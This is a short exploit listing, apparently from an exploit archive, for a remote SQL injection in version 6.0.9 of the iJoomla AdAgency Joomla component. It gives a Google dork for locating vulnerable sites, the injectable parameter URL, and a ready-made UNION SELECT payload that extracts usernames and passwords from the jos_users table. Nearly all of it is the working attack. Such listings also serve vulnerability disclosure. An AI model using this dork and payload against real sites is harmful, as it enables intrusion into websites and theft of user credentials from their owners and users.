iJoomla AdAgency 6.0.9 SQL Injection

iJoomla AdAgency component version 6.0.9 suffers from a remote SQL injection vulnerability.


MD5 | 30318823aa8bf5f59681179d5513c3c7

# Exploit Title: iJoomla com_adagency 6.0.9 - SQL Injection Vulnerabilities
# Date: 2020.05.02
# Author: Milad Karimi
# Software Link:
# Version: 6.0.9
# Category : webapps
# Tested on: windows 10 , firefox
# CVE : CWE-89
# Dork: inurl:index.php?option=com_adagency

index.php?option=com_adagency&controller=adagencyAds&status_select=Y-1%27[SQLI]**&camp_id=3

Example:

http://[site]/index.php?option=com_adagency&controller=adagencyAdvertisers&advertiser_status=
-9999999/**/union/**/select/**/0,concat(username,0x3a,password),0x3a,concat(username,0x3a,password),/**/from/**/jos_users/**>



Related Posts